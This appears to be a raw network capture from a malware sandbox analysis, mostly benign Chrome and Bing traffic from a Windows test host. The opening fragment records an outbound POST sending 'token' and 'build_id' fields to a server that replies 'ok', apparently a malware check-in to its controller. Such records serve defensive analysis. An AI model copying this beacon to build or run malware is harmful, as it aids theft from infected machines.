                                                                                                                                                                                                                                                                                                2024-12-20 06:31:16 UTC489OUTData Raw: 2d 2d 2d 2d 2d 2d 31 44 42 41 49 35 58 34 4f 5a 55 33 45 55 41 53 52 51 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 38 39 66 35 66 34 30 37 33 38 63 35 64 63 33 66 31 38 66 39 36 37 36 65 66 30 36 39 34 38 66 0d 0a 2d 2d 2d 2d 2d 2d 31 44 42 41 49 35 58 34 4f 5a 55 33 45 55 41 53 52 51 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 65 34 32 36 62 33 31 39 65 37 38 66 38 39 65 36 36 64 31 61 63 62 37 36 37 36 64 30 39 33 0d 0a 2d 2d 2d 2d 2d 2d 31 44 42 41 49 35 58 34 4f 5a 55 33 45 55 41 53 52 51 31 36 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                Data Ascii: ------1DBAI5X4OZU3EUASRQ16Content-Disposition: form-data; name="token"889f5f40738c5dc3f18f9676ef06948f------1DBAI5X4OZU3EUASRQ16Content-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------1DBAI5X4OZU3EUASRQ16Cont
2024-12-20 06:31:17 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 06:31:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-20 06:31:17 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.6 | 49758 | 150.171.27.10 | 443
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:18 UTC | 346 | OUT | GET /th?id=OADD2.10239381795372_1FAN52Y1AD18QPYNG&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Host: tse1.mm.bing.net
Connection: Keep-Alive
2024-12-20 06:31:18 UTC | 856 | IN | HTTP/1.1 200 OK
Cache-Control: public, max-age=2592000
Content-Length: 755702
Content-Type: image/jpeg
X-Cache: TCP_HIT
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
X-MSEdge-Ref: Ref A: 671A6C4B9033487ABE72C4F63DE7B0B6 Ref B: EWR311000107039 Ref C: 2024-12-20T06:31:18Z
Date: Fri, 20 Dec 2024 06:31:17 GMT
Connection: close


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                21192.168.2.649764172.217.21.364436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:19 UTC595OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: www.google.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=
                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
2024-12-20 06:31:20 UTC | 1266 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:20 GMT
                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                Expires: -1
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce--wM3H0t3UMqYu16uY-lYhw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                                Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                                Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                                Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                                Server: gws
                                                                                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                Accept-Ranges: none
                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
2024-12-20 06:31:20 UTC | 124 | IN
                                                                                                                                                                                                                                                                                                Data Ascii: 36c)]}'["",["social security december ssi payment","sza lana sos deluxe","infinity nikki friendship glow","women volleyba
2024-12-20 06:31:20 UTC | 759 | IN
                                                                                                                                                                                                                                                                                                Data Ascii: ll championship 2024","weather forecast snow storm minnesota","nasa astronauts stuck in space","jenna ortega unicorn movie","fed rate cut mortgage interest rates"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsi
2024-12-20 06:31:20 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.6 | 49766 | 172.217.21.36 | 443 | 6832 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:19 UTC | 353 | OUT | GET /async/ddljson?async=ntp:2 HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: www.google.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.6 | 49765 | 172.217.21.36 | 443 | 6832 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:19 UTC | 498 | OUT | GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: www.google.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=
                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
2024-12-20 06:31:20 UTC | 1018 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Version: 705503573
                                                                                                                                                                                                                                                                                                Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                                Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                                Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                                Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:20 GMT
                                                                                                                                                                                                                                                                                                Server: gws
                                                                                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                Accept-Ranges: none
                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
2024-12-20 06:31:20 UTC | 372 | IN
                                                                                                                                                                                                                                                                                                Data Ascii: 16af)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:20 UTC1390INData Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30
                                                                                                                                                                                                                                                                                                Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:20 UTC1390INData Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64
                                                                                                                                                                                                                                                                                                Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:20 UTC1390INData Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20
                                                                                                                                                                                                                                                                                                Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:20 UTC1273INData Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c
                                                                                                                                                                                                                                                                                                Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:20 UTC338INData Raw: 31 34 62 0d 0a 5b 22 6c 65 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 30 22 2c 22 6c 65 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 31 22 2c 22 6c 65 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 32 22 5d 2c 22 6d 65 6e 75 5f 70 6c 61 63 65 68 6f 6c 64 65 72 5f 6c 61 62 65 6c 22 3a 22 6d 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 33 31 33 2c 33 37 30 30 39 34 39 2c 33 37 30 31 33 38 34 2c 31 30 32 32 37 38 32 30 35 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22
                                                                                                                                                                                                                                                                                                Data Ascii: 14b["left_product_control-label0","left_product_control-label1","left_product_control-label2"],"menu_placeholder_label":"menu-content","metadata":{"bar_height":60,"experiment_id":[3700313,3700949,3701384,102278205],"is_backup_bar":false},"page_hooks":{"
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:20 UTC1390INData Raw: 38 30 30 30 0d 0a 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 5c 75 30 30 33 64 74 68 69 73 3b 5c 6e 74 72 79 7b 5c 6e 5f 2e 78 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 21 61 2e 6a 29 69 66 28 63 20 69 6e 73 74 61 6e 63 65 6f 66 20 41 72 72 61 79 29 66 6f 72 28 76 61 72 20 64 20 6f 66 20 63 29 5f 2e 78 64 28 61 2c 62 2c 64 29 3b 65 6c 73 65 7b 64 5c 75 30 30 33 64 28 30 2c 5f 2e 7a 29 28 61 2e 43 2c 61 2c 62 29 3b 63 6f 6e 73 74 20 65 5c 75 30 30 33 64 61 2e 76 2b 63 3b 61 2e 76 2b 2b 3b 62 2e 64 61 74 61 73 65 74 2e 65 71 69 64 5c 75 30 30 33 64 65 3b 61 2e 42 5b 65 5d 5c 75 30 30 33 64 64 3b 62 5c 75 30 30 32
                                                                                                                                                                                                                                                                                                Data Ascii: 8000s.gbar_\u003dthis.gbar_||{};(function(_){var window\u003dthis;\ntry{\n_.xd\u003dfunction(a,b,c){if(!a.j)if(c instanceof Array)for(var d of c)_.xd(a,b,d);else{d\u003d(0,_.z)(a.C,a,b);const e\u003da.v+c;a.v++;b.dataset.eqid\u003de;a.B[e]\u003dd;b\u002
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:20 UTC1390INData Raw: 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 49 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 7d 7d 3b 5f 2e 4a 64 5c 75 30 30 33 64 6e 65 77 20 5f 2e 49 64 28 5c 22 61 62 6f 75 74 3a 69 6e 76 61 6c 69 64 23 7a 43 6c 6f 73 75 72 65 7a 5c 22 29 3b 5f 2e 46 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 6e 68 5c 75 30 30 33 64 61 7d 7d 3b 5f 2e 4b 64 5c 75 30 30 33 64 5b 47 64 28 5c 22 64 61 74 61 5c 22 29 2c 47 64 28 5c 22 68 74 74 70 5c 22 29 2c 47 64 28 5c 22 68 74 74 70 73 5c 22 29 2c 47 64 28 5c 22 6d 61 69 6c 74 6f 5c 22 29
                                                                                                                                                                                                                                                                                                Data Ascii: obalThis.trustedTypes;_.Id\u003dclass{constructor(a){this.i\u003da}toString(){return this.i}};_.Jd\u003dnew _.Id(\"about:invalid#zClosurez\");_.Fd\u003dclass{constructor(a){this.nh\u003da}};_.Kd\u003d[Gd(\"data\"),Gd(\"http\"),Gd(\"https\"),Gd(\"mailto\")
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:20 UTC1390INData Raw: 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 29 7b 6c 65 74 20 63 2c 64 3b 62 5c 75 30 30 33 64 28 64 5c 75 30 30 33 64 28 63 5c 75 30 30 33 64 5c 22 64 6f 63 75 6d 65 6e 74 5c 22 69 6e 20 62 3f 62 2e 64 6f 63 75 6d 65 6e 74 3a 62 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 29 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 64 2e 63 61 6c 6c 28 63 2c 60 24 7b 61 7d 5b 6e 6f 6e 63 65 5d 60 29 3b 72 65 74 75 72 6e 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 5c 22 5c 22 3a 62 2e 6e 6f 6e 63 65 7c 7c 62 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5c 22 6e 6f 6e 63 65 5c 22 29 7c 7c 5c 22 5c 22 7d 3b 5c 6e 5f 2e 24 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b
                                                                                                                                                                                                                                                                                                Data Ascii: d\u003dfunction(a,b\u003ddocument){let c,d;b\u003d(d\u003d(c\u003d\"document\"in b?b.document:b).querySelector)\u003d\u003dnull?void 0:d.call(c,`${a}[nonce]`);return b\u003d\u003dnull?\"\":b.nonce||b.getAttribute(\"nonce\")||\"\"};\n_.$d\u003dfunction(a){
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:20 UTC1390INData Raw: 30 33 64 5c 75 30 30 33 64 5c 22 73 74 79 6c 65 5c 22 3f 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 63 6c 61 73 73 5c 22 3f 61 2e 63 6c 61 73 73 4e 61 6d 65 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 66 6f 72 5c 22 3f 61 2e 68 74 6d 6c 46 6f 72 5c 75 30 30 33 64 63 3a 6a 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 64 29 3f 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 6a 65 5b 64 5d 2c 63 29 3a 5f 2e 65 65 28 64 2c 5c 22 61 72 69 61 2d 5c 22 29 7c 7c 5f 2e 65 65 28 64 2c 5c 22 64 61 74 61 2d 5c 22 29 3f 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 64 2c 63 29 3a 61 5b 64 5d 5c 75 30 30 33 64 63 7d 29 7d 3b 6a 65 5c 75 30 30 33 64 7b 63 65 6c 6c 70 61 64
                                                                                                                                                                                                                                                                                                Data Ascii: 03d\u003d\"style\"?a.style.cssText\u003dc:d\u003d\u003d\"class\"?a.className\u003dc:d\u003d\u003d\"for\"?a.htmlFor\u003dc:je.hasOwnProperty(d)?a.setAttribute(je[d],c):_.ee(d,\"aria-\")||_.ee(d,\"data-\")?a.setAttribute(d,c):a[d]\u003dc})};je\u003d{cellpad


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.6 | 49768 | 172.217.21.36 | 443 | 6832 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:19 UTC | 353 | OUT | GET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: www.google.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
2024-12-20 06:31:20 UTC | 933 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Version: 705503573
                                                                                                                                                                                                                                                                                                Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                                Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Model
